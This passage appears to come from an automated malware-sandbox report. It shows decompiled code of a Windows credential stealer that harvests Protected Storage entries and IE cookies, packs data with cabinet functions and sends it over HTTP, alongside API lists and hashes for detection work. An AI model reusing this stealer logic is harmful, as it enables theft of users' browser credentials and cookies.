				char _v180;
				intOrPtr* _v188;
				char _v196;
				int _v204;
				char _v208;
				WCHAR* _v212;
				intOrPtr _v216;
				char _v224;
				short _v232;
				int _v236;
				intOrPtr _v240;
				short _v244;
				short* _v252;
				short _v256;
				char* _v260;
				short _v264;
				intOrPtr _v272;
				void* __edi;
				_Unknown_base(*)()* _t123;
				intOrPtr _t126;
				intOrPtr _t133;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				intOrPtr* _t146;
				short _t147;
				intOrPtr* _t148;
				short _t149;
				intOrPtr* _t150;
				short _t151;
				intOrPtr* _t152;
				short _t153;
				WCHAR* _t155;
				short _t156;
				char* _t161;
				int _t162;
				short _t165;
				char* _t167;
				signed char _t178;
				signed int _t179;
				short* _t181;
				intOrPtr* _t183;
				intOrPtr* _t185;
				intOrPtr* _t187;
				short _t200;
				char _t203;
				short _t221;
				short _t227;
				void* _t228;
				void* _t229;
				short* _t230;
				short _t233;
				short _t235;

				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
				_t233 = 0;
				_v84 = 0;
				_v36 = 0x10;
				_v32 = 2;
				_v28 = 0;
				_v24 = 0;
				_v92 = 0;
				_v76 = 0;
				if(_t123 == 0) {
					L45:
					_v68 = 0;
					_v72 = 0;
					if(E004050A3(_t192,  &_v72, 1,  &_v68) != 0) {
						_t226 = _v72;
						if(_v72 > 0) {
							_t133 = E0040F074(_t226 + _t233 + 0x32, _v92);
							if(_t133 != 0) {
								_v92 = _t133;
								E0040F0FC(E0040F0FC(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
							}
							E0040F0C0(_v68);
						}
					}
					_t126 = _v92;
					_t249 = _v92;
					if(_v92 == 0) {
						_t126 = "Empty";
					}
					E0041540F(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
					E0040F0C0(_v92);
					E004050A3(_t192, 0, 0, 0);
					E004055B9(1);
					return 1;
				}
				_push(0);
				_push(0);
				_push(0);
				_t192 =  &_v84;
				_push( &_v84);
				if( *_t123() != 0) {
					goto L45;
				}
				_t140 = _v100;
				if(_t140 == 0) {
					goto L45;
				}
				_t208 =  &_v72;
				_push( &_v72);
				_push(0);
				_push(0);
				_push(_t140);
				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
					L44:
					_t142 = _v116;
					_t192 =  *_t142;
					 *((intOrPtr*)( *_t142 + 8))(_t142);
					goto L45;
				} else {
					while(1) {
						_t144 = _v88;
						_push(0);
						_t208 =  &_v84;
						_push( &_v84);
						_push(1);
						_push(_t144);
						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
							break;
						}
						__eflags = _v100 - 0xe161255a;
						if(_v100 != 0xe161255a) {
							continue;
						}
						_t146 = _v132;
						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
						__eflags = _t147;
						if(_t147 != 0) {
							continue;
						}
						while(1) {
							_t148 = _v128;
							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
							__eflags = _t149;
							if(_t149 != 0) {
								break;
							}
							_t150 = _v168;
							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
							__eflags = _t151;
							if(_t151 != 0) {
								continue;
							}
							_v188 = 0;
							_v204 = 0;
							while(1) {
								_t152 = _v172;
								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
								__eflags = _t153;
								if(_t153 != 0) {
									break;
								}
								_t227 = StrStrW(_v212, L":StringData");
								__eflags = _t227;
								if(_t227 == 0) {
									continue;
								}
								__eflags =  *(_t227 + 0x16);
								if( *(_t227 + 0x16) != 0) {
									continue;
								}
								__eflags = _t227 - _v216;
								if(_t227 == _v216) {
									continue;
								}
								_t155 = _v212;
								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
								__eflags = _t156;
								if(_t156 != 0) {
									continue;
								}
								_t157 = _v244;
								__eflags = _v244 - 2;
								if(_v244 <= 2) {
									continue;
								}
								_t221 = E0040F0A8(_t157);
								_v232 = _t221;
								__eflags = _t221;
								if(_t221 == 0) {
									continue;
								}
								 *_t227 = 0;
								_t200 = _v244;
								_t161 =  &(_v260[_t200]);
								_t235 = 0;
								_t228 = 0;
								__eflags =  *(_t161 - 1);
								if( *(_t161 - 1) != 0) {
									L28:
									__eflags = _t200;
									if(_t200 <= 0) {
										L33:
										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
											_t235 = _t235 - 1;
											__eflags = _t235;
										}
										_t162 = E0040F533(_v252);
										_v236 = _t162;
										_t229 = _t162 + _t235 + _v240;
										_t60 = _t229 + 6; // 0x6
										_t165 = E0040F074(_t60, _v256);
										_v264 = _t165;
										__eflags = _t165;
										if(_t165 != 0) {
											_v256 = _t165;
											_t167 = _t165 + _v240;
											_v260 = _t167;
											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
											_v260 =  &(_v260[_v236]);
											 *_v260 = 0x20;
											_v260[1] = 0x3d;
											_v260[2] = 0x20;
											_v260 =  &(_v260[3]);
											E0040F0FC(_v260, _v232, _t235);
											 *((char*)(_t235 + _v272)) = 0xd;
											 *((char*)(_t235 + _v272 + 1)) = 0xa;
											_t230 = _t229 + 5;
											__eflags = _t230;
											 *((char*)(_t235 + _v272 + 2)) = 0;
											_v252 = _t230;
										}
										E0040F0C0(_v232);
										_t233 = _v244;
										continue;
									} else {
										goto L29;
									}
									do {
										L29:
										_t178 =  *((intOrPtr*)(_t228 + _v260));
										__eflags = _t178;
										if(_t178 != 0) {
											_t179 = _t178 & 0x000000ff;
										} else {
											_t179 = 0x7c;
										}
										 *(_t228 + _t221) = _t179;
										_t228 = _t228 + 1;
										_t235 = _t235 + 1;
										__eflags = _t228 - _v244;
									} while (_t228 < _v244);
									goto L33;
								}
								__eflags =  *(_t161 - 2);
								if( *(_t161 - 2) != 0) {
									goto L28;
								}
								__eflags = _t200;
								if(_t200 <= 0) {
									goto L33;
								} else {
									goto L19;
								}
								do {
									L19:
									_t181 =  &(_v260[_t228]);
									_t203 =  *_t181;
									__eflags = _t203;
									if(_t203 != 0) {
										__eflags = _t181[0];
										L23:
										if(__eflags <= 0) {
											 *(_t235 + _t221) = _t203;
										} else {
											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
											_t221 = _v232;
										}
										goto L26;
									}
									__eflags = _t181[0];
									if(__eflags != 0) {
										goto L23;
									}
									 *(_t235 + _t221) = 0x7c;
									L26:
									_t228 = _t228 + 2;
									_t235 = _t235 + 1;
									__eflags = _t228 - _v244;
								} while (_t228 < _v244);
								goto L33;
							}
							_t183 = _v188;
							 *((intOrPtr*)( *_t183 + 8))(_t183);
						}
						_t185 = _v144;
						 *((intOrPtr*)( *_t185 + 8))(_t185);
					}
					_t187 = _v104;
					 *((intOrPtr*)( *_t187 + 8))(_t187);
					goto L44;
				}
			}















































































    0x00405219
    0x00405221
    0x00405223
    0x00405227
    0x0040522f
    0x00405237
    0x0040523b
    0x0040523f
    0x00405243
    0x00405249
    0x00405517
    0x00405522
    0x00405526
    0x00405531
    0x00405533
    0x00405539
    0x00405543
    0x0040554a
    0x0040554e
    0x00405568
    0x00405568
    0x00405571
    0x00405571
    0x00405539
    0x00405576
    0x0040557a
    0x0040557e
    0x00405580
    0x00405580
    0x0040558f
    0x0040559b
    0x004055a4
    0x004055ab
    0x004055b8
    0x004055b8
    0x0040524f
    0x00405250
    0x00405251
    0x00405252
    0x00405256
    0x0040525b
    0x00000000
    0x00000000
    0x00405261
    0x00405267
    0x00000000
    0x00000000
    0x0040526f
    0x00405273
    0x00405274
    0x00405275
    0x00405276
    0x0040527c
    0x0040550d
    0x0040550d
    0x00405511
    0x00405514
    0x00000000
    0x00405282
    0x004054e9
    0x004054e9
    0x004054ef
    0x004054f0
    0x004054f4
    0x004054f5
    0x004054f7
    0x004054fd
    0x00000000
    0x00000000
    0x00405287
    0x0040528f
    0x00000000
    0x00000000
    0x00405295
    0x004052a8
    0x004052ab
    0x004052ad
    0x00000000
    0x00000000
    0x004054c5
    0x004054c5
    0x004054d4
    0x004054d7
    0x004054d9
    0x00000000
    0x00000000
    0x004052b8
    0x004052d0
    0x004052d3
    0x004052d5
    0x00000000
    0x00000000
    0x004052db
    0x004052df
    0x004054a1
    0x004054a1
    0x004054b0
    0x004054b3
    0x004054b5
    0x00000000
    0x00000000
    0x004052f7
    0x004052f9
    0x004052fb
    0x00000000
    0x00000000
    0x00405301
    0x00405305
    0x00000000
    0x00000000
    0x0040530b
    0x0040530f
    0x00000000
    0x00000000
    0x00405315
    0x0040533c
    0x0040533f
    0x00405341
    0x00000000
    0x00000000
    0x00405347
    0x0040534b
    0x0040534e
    0x00000000
    0x00000000
    0x00405359
    0x0040535b
    0x0040535f
    0x00405361
    0x00000000
    0x00000000
    0x00405369
    0x0040536c
    0x00405374
    0x00405376
    0x00405378
    0x0040537a
    0x0040537d
    0x004053cb
    0x004053cb
    0x004053cd
    0x004053ed
    0x004053ed
    0x004053f2
    0x004053f4
    0x004053f4
    0x004053f4
    0x004053f9
    0x00405406
    0x0040540c
    0x0040540f
    0x00405412
    0x00405417
    0x0040541b
    0x0040541d
    0x00405425
    0x00405429
    0x00405432
    0x0040543c
    0x00405446
    0x0040544e
    0x00405455
    0x00405462
    0x00405466
    0x0040546f
    0x00405478
    0x00405480
    0x00405489
    0x00405489
    0x0040548c
    0x00405490
    0x00405490
    0x00405498
    0x0040549d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004053cf
    0x004053cf
    0x004053d3
    0x004053d6
    0x004053d8
    0x004053df
    0x004053da
    0x004053dc
    0x004053dc
    0x004053e2
    0x004053e5
    0x004053e6
    0x004053e7
    0x004053e7
    0x00000000
    0x004053cf
    0x0040537f
    0x00405382
    0x00000000
    0x00000000
    0x00405384
    0x00405386
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405388
    0x00405388
    0x0040538c
    0x0040538e
    0x00405390
    0x00405392
    0x0040539f
    0x004053a2
    0x004053a2
    0x004053bd
    0x004053a4
    0x004053b1
    0x004053b7
    0x004053b7
    0x00000000
    0x004053a2
    0x00405394
    0x00405397
    0x00000000
    0x00000000
    0x00405399
    0x004053c0
    0x004053c1
    0x004053c2
    0x004053c3
    0x004053c3
    0x00000000
    0x004053c9
    0x004054bb
    0x004054c2
    0x004054c2
    0x004054df
    0x004054e6
    0x004054e6
    0x00405503
    0x0040550a
    0x00000000
    0x0040550a

    APIs
    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405212
    • GetProcAddress.KERNELBASE(00000000), ref: 00405219
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
    • API String ID: 2574300362-834128494
    • Opcode ID: c7d10ab29ebc81ba8573217b75d0e70815db3f7ee8b5bae6ae4cebbb3cdbecfa
    • Instruction ID: 1e41f8bf5fa9401bcdaa6836c9241a5a4b994f9ff3dd797a9841cb132af8be6f
    • Opcode Fuzzy Hash: c7d10ab29ebc81ba8573217b75d0e70815db3f7ee8b5bae6ae4cebbb3cdbecfa
    • Instruction Fuzzy Hash: F3C18771208741AFD710DF64C884E6BBBE9EFC8308F04892EF485A7291D679D949CF66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E267, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162networkstringCOMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E0040E267(long _a4) {
				void _v8;
				void _v60;
				void _v1084;
				void* __ebx;
				void* __edi;
				char* _t62;
				char* _t67;
				int _t73;
				intOrPtr _t78;
				intOrPtr _t82;
				void* _t101;
				signed int _t103;
				char* _t108;
				void* _t109;
				char* _t110;
				char** _t113;

				E00414B37();
				_t113 = _a4;
				_t113[3] = 0;
				_t113[1][8] = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
				_t62 = _t113[1];
				_t101 = _t62[8];
				if(_t101 == 0) {
					L19:
					return _t62;
				}
				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
				_t62 = _t113[1];
				if(_t62[0xc] == 0) {
					goto L19;
				}
				_push(_t109);
				_t110 = E0040C725(0,  *_t113, _t109, _t113[2][0x2c]);
				_t67 = _t113[2];
				if(_t67[0xc] != 4) {
					_t103 = 0;
				} else {
					_t103 = 0x800000;
				}
				_t108 = _t110;
				if(_t110 == 0) {
					_t108 = _t67[0x2c];
				}
				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
				E0040F0C0(_t110);
				_t73 = _t113[1];
				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
					_a4 = 0x31;
					if(HttpQueryInfoA(( *_t113)[0x430], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
						_t78 =  *0x416c34; // 0x25df5a8
						_t30 = _t78 + 0x124; // 0x25dffb9
						 *0x416eec( &_v60,  *_t30);
					}
					_t82 =  *0x416c34; // 0x25df5a8
					_t33 = _t82 + 0x128; // 0x2563de1
					wnsprintfA( &_v1084, 0x3ff,  *_t33,  &_v60,  *0x416df0);
					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
					InternetSetStatusCallback(_t113[1][0x10], E0040E21E);
					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x428], ( *_t113)[0x42c]);
					if(_t73 != 0) {
						_a4 = 4;
						_v8 = 0;
						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
						if(_t73 != 0 && _v8 == 0xc8) {
							_a4 = 0x3ff;
							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
							if(_t73 != 0 && _a4 > 5) {
								_t73 = E0040D3EA( &_v1084, _a4);
							}
							_t113[3] = 1;
						}
					}
				}
				return _t73;
			}



















    0x0040e272
    0x0040e277
    0x0040e280
    0x0040e292
    0x0040e295
    0x0040e298
    0x0040e29d
    0x0040e455
    0x0040e455
    0x0040e455
    0x0040e2be
    0x0040e2c1
    0x0040e2c7
    0x00000000
    0x00000000
    0x0040e2d2
    0x0040e2db
    0x0040e2dd
    0x0040e2e4
    0x0040e2ed
    0x0040e2e6
    0x0040e2e6
    0x0040e2e6
    0x0040e2ef
    0x0040e2f3
    0x0040e2f5
    0x0040e2f5
    0x0040e31c
    0x0040e31f
    0x0040e324
    0x0040e32a
    0x0040e340
    0x0040e355
    0x0040e35c
    0x0040e361
    0x0040e36b
    0x0040e36b
    0x0040e37b
    0x0040e380
    0x0040e393
    0x0040e3b0
    0x0040e3c1
    0x0040e3dd
    0x0040e3e5
    0x0040e3f8
    0x0040e3ff
    0x0040e405
    0x0040e40d
    0x0040e428
    0x0040e42e
    0x0040e436
    0x0040e448
    0x0040e448
    0x0040e44d
    0x0040e44d
    0x0040e40d
    0x0040e3e5
    0x00000000

    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040E289
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E2B5
      • Part of subcall function 0040C725: lstrcpy.KERNEL32(00000001,?), ref: 0040C7A8
    • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040E312
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040E34D
    • lstrcpy.KERNEL32(?,025DFFB9), ref: 0040E36B
    • wnsprintfA.SHLWAPI ref: 0040E393
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040E3B0
    • InternetSetStatusCallback.WININET(?,Function_0000E21E), ref: 0040E3C1
    • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040E3DD
    • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040E405
    • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040E42E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
    • String ID: 1
    • API String ID: 1779409970-2212294583
    • Opcode ID: e3d6831a58ceabd51792ae80bf6da536e72aba9669ef170af2d0a26ecac9d059
    • Instruction ID: e0811e261b331205156510df7ad10474af5a29e52472d4cba52f40995be04c8e
    • Opcode Fuzzy Hash: e3d6831a58ceabd51792ae80bf6da536e72aba9669ef170af2d0a26ecac9d059
    • Instruction Fuzzy Hash: B75128B1600208AFDB20DF55CC84E9ABBF9FB08354B0184BAF659972A1D735ED50CF68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411A6B, Relevance: 21.0, APIs: 7, Strings: 5, Instructions: 49libraryloadermemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00411A6B() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;

				_t11 =  *0x41807c; // 0x0
				if(_t11 != 0) {
					L9:
					 *0x41807c =  *0x41807c + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x418078 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x4176a4 = GetProcAddress(_t2, "FCICreate");
						 *0x418068 = GetProcAddress( *0x418078, "FCIAddFile");
						 *0x41706c = GetProcAddress( *0x418078, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x418078, "FCIDestroy");
						 *0x41806c = _t7;
						_t13 =  *0x4176a4; // 0x0
						if(_t13 == 0) {
							L7:
							FreeLibrary( *0x418078);
							goto L8;
						} else {
							_t14 =  *0x418068; // 0x0
							if(_t14 == 0) {
								goto L7;
							} else {
								_t15 =  *0x41706c; // 0x0
								if(_t15 == 0 || _t7 == 0) {
									goto L7;
								} else {
									_t9 = HeapCreate(0, 0x80000, 0);
									 *0x417068 = _t9;
									if(_t9 != 0) {
										goto L9;
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
			}










    0x00411a6e
    0x00411a74
    0x00411b27
    0x00411b27
    0x00411b30
    0x00411a7a
    0x00411a7f
    0x00411a85
    0x00411a8c
    0x00411b23
    0x00411b26
    0x00411a92
    0x00411aa9
    0x00411abf
    0x00411ad5
    0x00411ada
    0x00411ae0
    0x00411ae5
    0x00411aeb
    0x00411b17
    0x00411b1d
    0x00000000
    0x00411aed
    0x00411aed
    0x00411af3
    0x00000000
    0x00411af5
    0x00411af5
    0x00411afb
    0x00000000
    0x00411b01
    0x00411b08
    0x00411b0e
    0x00411b15
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00411b15
    0x00411afb
    0x00411af3
    0x00411aeb
    0x00411a8c

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,00411B5A,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411A7F
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411A98
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 00411AAE
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411AC4
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 00411ADA
    • HeapCreate.KERNEL32(00000000,00080000,00000000,?,00415534,?,00405611,?), ref: 00411B08
    • FreeLibrary.KERNEL32(?,00415534,?,00405611,?), ref: 00411B1D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: a1086923eb04050a66416021c89fe9b763a696cf6dbbafcac4b8d3948ad0bafb
    • Instruction ID: 9aa1ad1c7efff67d9ab0d23b22303702fcbabadc46934d03c35de23447c37219
    • Opcode Fuzzy Hash: a1086923eb04050a66416021c89fe9b763a696cf6dbbafcac4b8d3948ad0bafb
    • Instruction Fuzzy Hash: 5A1115B4A49724DBCB112F70BC489DA3F30A70DB12722C13AF245A2274DB785889CF9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C7C1, Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 375stringnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E0040C7C1(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v16;
				char* _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char* _v40;
				char _v1064;
				void* _t127;
				void* _t132;
				void* _t133;
				char _t134;
				signed int _t144;
				char _t145;
				signed int _t157;
				char _t158;
				char* _t159;
				char* _t163;
				signed int _t168;
				intOrPtr _t169;
				char* _t170;
				intOrPtr _t173;
				int _t175;
				signed int _t178;
				void* _t180;
				intOrPtr _t182;
				intOrPtr _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t193;
				intOrPtr _t194;
				intOrPtr* _t196;
				char* _t197;
				char* _t198;
				char _t199;
				intOrPtr _t201;
				intOrPtr _t203;
				void* _t216;
				void* _t219;
				void* _t223;
				void* _t224;
				void* _t226;
				char _t227;
				char* _t228;
				void* _t230;
				intOrPtr* _t233;
				void* _t234;
				intOrPtr _t235;
				intOrPtr* _t236;
				char* _t237;
				signed int _t238;
				void* _t239;
				void* _t240;

				_t230 = __esi;
				_t219 = __edi;
				_t193 = __ebx;
				 *0x416eec( &_v1064, _a4);
				_t127 = E0040F521( &_v1064);
				while(1) {
					_t127 = _t127 - 1;
					if(_t127 == 0) {
						break;
					}
					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
						continue;
					}
					_t201 =  *0x416c34; // 0x25df5a8
					_t6 = _t201 + 0x14c; // 0x2563e59
					 *0x416eec(_t239 + _t127 - 0x423,  *_t6, _t219);
					E00414B37();
					_t132 = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
					if(_t132 == 0) {
						L95:
						break;
					}
					_t133 = InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0);
					_t245 = _t133;
					if(_t133 == 0) {
						goto L95;
					}
					_push(_t230);
					_t134 = E00406AC3( &_v1064,  &_v36, _t245, 0xffff, _t133);
					_v8 = _t134;
					if(_t134 == 0) {
						L94:
						goto L95;
					}
					_t233 = _v36;
					_push(_t193);
					_t194 = 0;
					_t216 = 0;
					_t223 = "*<select " - _t233;
					do {
						_t203 =  *((intOrPtr*)(_t223 + _t233));
						if(_t203 - 0x41 <= 0x19) {
							_t203 = _t203 + 0x20;
						}
						if(_t203 != 0x23) {
							__eflags = _t203 - 0x2a;
							if(_t203 == 0x2a) {
								_t16 = _t216 + 1; // 0x1
								__eflags = _t16 - 9;
								if(__eflags != 0) {
									__eflags = _t194 - _v8;
									if(_t194 >= _v8) {
										goto L93;
									}
									_t224 = 8;
									_t225 = _t224 - _t216;
									__eflags = _t224 - _t216;
									_t20 = _t216 +  &M00404055; // 0x404055
									_t234 = _t20;
									while(1) {
										_t144 = E0040AD1B(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
										__eflags = _t144;
										if(_t144 != 0) {
											break;
										}
										_t194 = _t194 + 1;
										__eflags = _t194 - _v8;
										if(_t194 < _v8) {
											continue;
										}
										goto L93;
									}
									_t25 =  &_v16;
									 *_t25 = _v16 + _t194;
									__eflags =  *_t25;
									L28:
									_t145 = _v16;
									_v28 = _v28 & 0x00000000;
									_v32 = _v32 & 0x00000000;
									_v8 = _v8 - _t145;
									_t196 = _t145 + _v36;
									_v9 = 0;
									do {
										_v20 = "*<option  selected";
										_t235 = 0;
										_t226 = 0;
										_v20 = _v20 - _t196;
										_t218 = _t196;
										do {
											_t206 = _v20[_t218];
											if(_t206 - 0x41 <= 0x19) {
												_t206 = _t206 + 0x20;
											}
											if(_t206 != 0x23) {
												__eflags = _t206 - 0x2a;
												if(_t206 == 0x2a) {
													_t44 = _t226 + 1; // 0x1
													__eflags = _t44 - 0x12;
													if(__eflags != 0) {
														__eflags = _t235 - _v8;
														if(__eflags >= 0) {
															goto L91;
														}
														_v20 = 0x11;
														_t49 =  &_v20;
														 *_t49 = _v20 - _t226;
														__eflags =  *_t49;
														_t51 = _t226 +  &M00404061; // 0x74706f3c
														_t227 = _t51;
														while(1) {
															_t218 = _v20;
															_t206 = _t227;
															_t157 = E0040AD1B(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
															__eflags = _t157;
															if(_t157 != 0) {
																break;
															}
															_t235 = _t235 + 1;
															__eflags = _t235 - _v8;
															if(__eflags < 0) {
																continue;
															}
															goto L91;
														}
														_t57 =  &_v16;
														 *_t57 = _v16 + _t235;
														__eflags =  *_t57;
														L51:
														_t158 = _v16;
														_t197 = _t196 + _t158;
														_t60 =  &_v8;
														 *_t60 = _v8 - _t158;
														if( *_t60 == 0) {
															goto L91;
														}
														while( *_t197 != 0x3e) {
															_t197 = _t197 + 1;
															_t62 =  &_v8;
															 *_t62 = _v8 - 1;
															if( *_t62 != 0) {
																continue;
															}
															break;
														}
														if(_v8 == 0) {
															goto L91;
														}
														_t198 = _t197 + 1;
														_t206 = _v8 + _t198;
														_v40 = _t198;
														_t159 = _t198;
														if(_t198 >= _t206) {
															L58:
															if(_t159 == _t206) {
																goto L91;
															}
															_t206 = _t159 - _t198;
															if(_t159 - _t198 > 0x200) {
																goto L91;
															}
															_v8 = _v8 + _t198 - _t159;
															_t236 = _t159 + 1;
															_t228 = 0;
															_v24 = "*<input *value=\"";
															_v24 = _v24 - _t236;
															 *_t159 = 0;
															_v20 = 0;
															_t218 = _t236;
															do {
																_t206 = _v24[_t218];
																if(_t206 - 0x41 <= 0x19) {
																	_t206 = _t206 + 0x20;
																}
																if(_t206 != 0x23) {
																	__eflags = _t206 - 0x2a;
																	if(_t206 == 0x2a) {
																		_t163 = _v20;
																		_t82 = _t163 + 1; // 0x12
																		_t206 = _t82;
																		__eflags = _t82 - 0x10;
																		if(__eflags != 0) {
																			__eflags = _t228 - _v8;
																			if(__eflags >= 0) {
																				goto L91;
																			}
																			_v24 = 0xf;
																			_t87 =  &_v24;
																			 *_t87 = _v24 - _t163;
																			__eflags =  *_t87;
																			_t89 = _t163 +  &M00404075; // 0x404086
																			_t199 = _t89;
																			while(1) {
																				_t218 = _v24;
																				_t206 = _t199;
																				_t168 = E0040AD1B(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
																				__eflags = _t168;
																				if(_t168 != 0) {
																					break;
																				}
																				_t228 = _t228 + 1;
																				__eflags = _t228 - _v8;
																				if(__eflags < 0) {
																					continue;
																				}
																				goto L91;
																			}
																			_t95 =  &_v16;
																			 *_t95 = _v16 + _t228;
																			__eflags =  *_t95;
																			_t196 = _v40;
																			L82:
																			_t169 = _v16;
																			_v8 = _v8 - _t169;
																			_t237 = _t236 + _t169;
																			_t206 = _v8 + _t237;
																			_t170 = _t237;
																			if(_t237 >= _t206) {
																				L85:
																				if(_t170 == _t206) {
																					goto L91;
																				}
																				_t206 = _t170 - _t237;
																				if(_t170 - _t237 > 0x200) {
																					goto L91;
																				}
																				 *_t170 = 0;
																				_t173 =  *0x416c34; // 0x25df5a8
																				_t103 = _t173 + 0x150; // 0x25633f9
																				_t175 = wnsprintfA( &_v1064, 0x400,  *_t103, (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
																				_t229 = _t175;
																				_t240 = _t240 + 0x1c;
																				_t238 = _t175 + _v32;
																				_t178 = E0040F074(_t238 + 0xa, _v28);
																				if(_t178 == 0) {
																					E0040F0C0(_v28);
																					_t118 =  &_v32;
																					 *_t118 = _v32 & 0x00000000;
																					__eflags =  *_t118;
																					goto L91;
																				}
																				goto L88;
																			}
																			while( *_t170 != 0x22) {
																				_t170 = _t170 + 1;
																				if(_t170 < _t206) {
																					continue;
																				}
																				goto L85;
																			}
																			goto L85;
																		}
																		_v16 = _v8;
																		goto L82;
																	}
																	_t182 =  *_t218;
																	__eflags = _t182 - 0x41;
																	if(_t182 < 0x41) {
																		L70:
																		_t183 = _t182;
																		L71:
																		__eflags = _t206 - _t183;
																		if(__eflags != 0) {
																			goto L91;
																		}
																		goto L72;
																	}
																	__eflags = _t182 - 0x5a;
																	if(_t182 > 0x5a) {
																		goto L70;
																	}
																	_t183 = _t182 + 0x20;
																	goto L71;
																} else {
																	if(_t228 == _v8) {
																		goto L91;
																	}
																}
																L72:
																_t228 = _t228 + 1;
																_t218 = _t218 + 1;
																_v20 =  &(_v20[1]);
															} while (_v20 != 0x10);
															_v16 = _t228;
															goto L82;
														}
														while( *_t159 != 0x3c) {
															_t159 = _t159 + 1;
															if(_t159 < _t206) {
																continue;
															}
															goto L58;
														}
														goto L58;
													}
													_v16 = _v8;
													goto L51;
												}
												_t186 =  *_t218;
												__eflags = _t186 - 0x41;
